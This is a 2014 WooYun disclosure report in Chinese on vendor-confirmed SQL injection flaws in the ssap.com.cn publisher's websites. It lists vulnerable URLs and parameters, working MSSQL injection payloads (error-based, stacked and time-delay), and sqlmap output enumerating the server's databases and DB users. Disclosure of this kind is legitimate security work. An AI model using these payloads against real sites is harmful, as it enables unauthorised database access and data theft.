漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-080037
漏洞标题:社会科学文献出版社SQL注射漏洞
相关厂商:ssap.com.cn
漏洞作者: 紫霞仙子
提交时间:2014-10-21 09:58
修复时间:2014-12-05 10:00
公开时间:2014-12-05 10:00
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-21: 厂商已经确认,细节仅向厂商公开
2014-10-31: 细节向核心白帽子及相关领域专家公开
2014-11-10: 细节向普通白帽子公开
2014-11-20: 细节向实习白帽子公开
2014-12-05: 细节向公众公开
简要描述:
好几处。
详细说明:
http://www.ssap.com.cn/member/Member_SeenData.aspx?userid=38424
参数userid
http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449
http://www.ssap.com.cn/SKWX/Job_Show.aspx?Hr_id=112
http://www.ssap.com.cn/Shop/BookMainContent.aspx?ProductManager_Id=20121120093656
http://books.ssap.com.cn/member/Member_Homepage.aspx?userid=
漏洞证明:
---
Place: GET
Parameter: userid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userid=38424' AND 5712=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR
(99)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5712=5712) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(119)+CHAR(114)+CHAR(100)+CHAR(113))) AND 'xBSD'='xBSD
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: userid=38424'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: userid=38424' WAITFOR DELAY '0:0:5'--
---
available databases [24]:
[*] BH_CMS_v4.1
[*] BH_SSAP_EN
[*] fll
[*] fll_new
[*] master
[*] model
[*] msdb
[*] new524
[*] pishu
[*] pishuDB
[*] ReportServer
[*] ReportServerTempDB
[*] ssap_20131021
[*] ssap_new
[*] ssap_new_DB
[*] ssap_new_DB(0427)
[*] ssap_new_test1
[*] ssap_temp
[*] ssdph_new
[*] tempdb
[*] test
[*] test_6-21
[*] ttttt
[*] vote
database management system users password hashes:
[*] Administrators [1]:
password hash: NULL
[*] ssap-db [1]:
password hash: NULL
修复方案:
~~检查下吧,好多
版权声明:转载请注明来源 紫霞仙子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-10-21 13:21
厂商回复:
非常感谢
最新状态:
暂无